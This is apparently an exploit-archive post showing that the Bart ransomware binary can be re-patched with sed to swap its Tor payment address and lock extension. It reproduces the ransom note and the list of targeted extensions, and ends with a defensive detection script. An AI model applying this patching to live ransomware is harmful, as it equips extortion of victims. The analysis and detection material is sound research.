Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
Posted Nov 8, 2016
Authored by Todor Donev

This report shows that the Bart binary can be patched: an attacker can edit its embedded strings and seamlessly substitute their own dark web site with a different Bitcoin account.

tags | exploit
SHA-256 | 235979bd4239144dac76322065de02f0e43ecad6b1af8f34cf9b75dd3c4fb090

#!/bin/sh
#
# Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
#
# Thanks to Maya Hristova, who supports me.
#
#
# Description:
# Bart is a simple yet insidious ransomware
# program that locks files in encrypted,
# inaccessible archives until a ransom is paid.
# Bart, like most ransomware programs, searches
# for files that match a given description, then
# encrypts those files, leaving them unusable.
# This means all files of certain extensions (e.g.
# .pdf, .xls, etc.) will be inaccessible until
# the victim acquires the key. To obtain the key,
# the victim must pay a ransom.
#
# Some of the main features of Bart ransomware
# include the following:
# o The software enters the computer through a ZIP
# attachment to an email.
# o The attachment contains a JavaScript file
# that, if executed, initiates the installation
# of Bart.
# o Unlike similar malware, Bart locks your
# files in encrypted, password-protected ZIP
# archives, rendering the files inaccessible.
# After the encryption, the naming format
# for the resulting ZIP archive is as follows:
# original_name.bart.zip.
#
# Disclaimer:
# This and previous programs are for Educational
# purposes ONLY. Do not use them without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (data loss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#


[todor@adamantium]$ strings bart.bin | grep -i -A 235 "Tahoma"

# Tahoma
# Control Panel\Desktop
# WallpaperStyle
# TileWallpaper
# AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV
# winnt
# Application Data
# AppData
# PerfLogs
# Program Files (x86)
# Program Files
# ProgramData
# temp
# Recovery
# $Recycle.Bin
# System Volume Information
# Boot
# Windows
# .n64
# .m4u
# .m3u
# .mid
# .wma
# .flv
# .3g2
# .mkv
# .3gp
# .mp4
# .mov
# .avi
# .asf
# .mpeg
# .vob
# .mpg
# .wmv
# .fla
# .swf
# .wav
# .mp3
# .qcow2
# .vdi
# .vmdk
# .vmx
# .gpg
# .aes
# .ARC
# .PAQ
# .tar.bz2
# .tbk
# .bak
# .tar
# .tgz
# .rar
# .zip
# .djv
# .djvu
# .svg
# .bmp
# .png
# .gif
# .raw
# .cgm
# .jpeg
# .jpg
# .tif
# .tiff
# .NEF
# .psd
# .cmd
# .bat
# .class
# .jar
# .java
# .asp
# .brd
# .sch
# .dch
# .dip
# .vbs
# .asm
# .pas
# .cpp
# .php
# .ldf
# .mdf
# .ibd
# .MYI
# .MYD
# .frm
# .odb
# .dbf
# .mdb
# .SQLITEDB
# .SQLITE3
# .asc
# .lay6
# .lay
# .ms11(Security copy)
# .ms11
# .sldm
# .sldx
# .ppsm
# .ppsx
# .ppam
# .docb
# .sxm
# .otg
# .odg
# .uop
# .potx
# .potm
# .pptx
# .pptm
# .std
# .sxd
# .pot
# .pps
# .sti
# .sxi
# .otp
# .odp
# .wb2
# .123
# .wks
# .wk1
# .xltx
# .xltm
# .xlsx
# .xlsm
# .xlsb
# .slk
# .xlw
# .xlt
# .xlm
# .xlc
# .dif
# .stc
# .sxc
# .ots
# .ods
# .hwp
# .602
# .dotm
# .dotx
# .docm
# .docx
# .DOT
# .3dm
# .max
# .3ds
# .txt
# .CSV
# .uot
# .RTF
# .pdf
# .XLS
# .PPT
# .stw
# .sxw
# .ott
# .odt
# .DOC
# .pem
# .p12
# .csr
# .crt
# .key
# !!! IMPORTANT INFORMATION !!!
# All your files are encrypted.
# Decrypting of your files is only possible with the private key, which is on our secret server.
# To receive your private key follow one of the links:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# If all addresses are not available, follow these steps:
# 1. Download and install Tor Browser: https://torproject.org/download/download-easy.html
# 2. After successfull installation, run the browser and wait for initialization.
# 3. Type in the address bar:
# %s.onion/?id=%s
# 4. Follow the instructions on the site.
# !!! INFORMAZIONI IMPORTANTI !!!
# Tutti i file sono criptati.
# Decifrare dei file è possibile solo con la chiave privata, che è sul nostro server segreto.
# Per ricevere la chiave privata seguire uno dei link :
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Se tutti gli indirizzi non sono disponibili, attenersi alla seguente procedura:
# 1. Scaricare e installare Tor Browser: https://torproject.org/download/download-easy.html
# 2. Dopo l'installazione di successo, eseguire il browser e attendere l'inizializzazione.
# 3. Digitare nella barra degli indirizzi:
# %s.onion/?id=%s
# 4. Seguire le istruzioni sul sito
# !!! INFORMATIONS IMPORTANTES !!!
# Tous vos fichiers sont cryptés.
# Déchiffrer de vos fichiers est seulement possible avec la clé privée, qui est sur notre serveur secret.
# Pour recevoir votre clé privée suivre l'un des liens:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Si toutes les adresses ne sont pas disponibles, procédez comme suit:
# 1. Téléchargez et installez Tor Browser: https://torproject.org/download/download-easy.html
# 2. Une fois l'installation réussie, exécutez le navigateur et attendez que l'initialisation.
# 3. Tapez dans la barre d'adresse:
# %s.onion/?id=%s
# 4. Suivez les instructions sur le site.
# !!! WICHTIGE INFORMATIONEN !!!
# Alle Ihre Dateien werden verschlüsselt.
# Entschlüsseln der Dateien ist nur mit dem privaten Schlüssel, die auf unserer geheimen Server ist.
# So empfangen Sie Ihren privaten Schlüssel auf einen der Links folgen:
# 1. http://%s.tor2web.org/?id=%s
# 2. http://%s.onion.to/?id=%s
# 3. http://%s.onion.cab/?id=%s
# 4. http://%s.onion.link/?id=%s
# Wenn alle Adressen nicht verfügbar sind, gehen Sie folgendermaßen vor:
# 1. Downloaden und installieren Browser Tor: https://torproject.org/download/download-easy.html
# 2. Nach erfolgreicher Installation der Browser ausgeführt wird und für die Initialisierung warten.
# 3. Geben Sie in der Adressleiste:
# %s.onion/?id=%s
# 4. Folgen Sie den Anweisungen auf der Website.
# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre persönliche Identifikations ID: %s !!!
# !!! Su identificación personal ID : %s !!!
# khh5cmzh5q7yp7th # DARKWEB ADDRESS: http://khh5cmzh5q7yp7th.onion/
# .bart # LOCKED FILE FORMAT: .bart.zip
# .recover.
# \\.\
# recover.txt
# \recover.bmp
# \recover.txt
# notepad.exe "

[todor@adamantium]$ sed -i 's/khh5cmzh5q7yp7th/1234567890123456/g' bart.bin
[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre persönliche Identifikations ID: %s !!!
# !!! Su identificación personal ID : %s !!!
# 1234567890123456 # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
# .bart
# .recover.
# \\.\
# recover.txt

[todor@adamantium]$ sed -i 's/.bart/.ethk/g' bart.bin

[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# !!! Your personal identification ID: %s !!!
# !!! La vostra identificazione personale ID: %s !!!
# !!! Votre identification personnelle ID: %s !!!
# !!! Ihre persönliche Identifikations ID: %s !!!
# !!! Su identificación personal ID : %s !!!
# 1234567890123456 # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
# .ethk # LOCKED FILE FORMAT IS CHANGED TO: .ethk.zip
# .recover.
# \\.\
# recover.txt
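To turn the observation above into a check a responder can run over a suspected sample, here is an added example (not part of the original post) in Python: a minimal strings-style scan that pulls the onion id and lock extension from just before the `.recover.` marker, compares them with the values in the dump, and flags an id that is not a syntactically valid v2 onion hostname, as the 1234567890123456 replacement above is not. It assumes the same string order as the dump; the sample bytes are constructed, not taken from a real binary.

```python
import re

# Constructed stand-in for the string table the post dumps with `strings bart.bin`:
# NUL-separated entries around the ".recover." marker. Not a real sample.
SAMPLE = b"\x00".join([
    b"!!! Your personal identification ID: %s !!!",
    b"khh5cmzh5q7yp7th",      # v2 onion hostname of the payment site
    b".bart",                 # extension appended to each locked ZIP
    b".recover.",
    b"\\\\.\\",
    b"recover.txt",
]) + b"\x00"

KNOWN_ONION = "khh5cmzh5q7yp7th"   # value shown in the post's dump
KNOWN_EXT = ".bart"
ONION_V2_RE = re.compile(r"^[a-z2-7]{16}$")  # 16 base32 chars; 0, 1, 8, 9 never occur


def printable_strings(data, min_len=4):
    """Minimal `strings`-style scan: runs of at least min_len printable ASCII bytes."""
    pat = b"[\\x20-\\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, data)]


def extract_config(data):
    """Recover the onion id and lock extension that sit just before ".recover."."""
    strs = printable_strings(data)
    try:
        i = strs.index(".recover.")
    except ValueError:
        return None                      # marker absent: not the layout we expect
    if i < 2:
        return None
    onion, ext = strs[i - 2], strs[i - 1]
    return {
        "onion": onion,
        "ext": ext,
        # A hostname outside the base32 alphabet cannot resolve on Tor at all.
        "valid_onion": bool(ONION_V2_RE.match(onion)),
        # Any difference from the dumped values means a re-patched build.
        "matches_known": onion == KNOWN_ONION and ext == KNOWN_EXT,
    }


if __name__ == "__main__":
    patched = (SAMPLE.replace(b"khh5cmzh5q7yp7th", b"1234567890123456")
                     .replace(b".bart", b".ethk"))
    for label, blob in (("original", SAMPLE), ("patched", patched)):
        print(label, extract_config(blob))
```

The patched case only works because both replacements keep the string length; a length change would shift every following resource offset and is exactly what a size or hash comparison of the sample would catch.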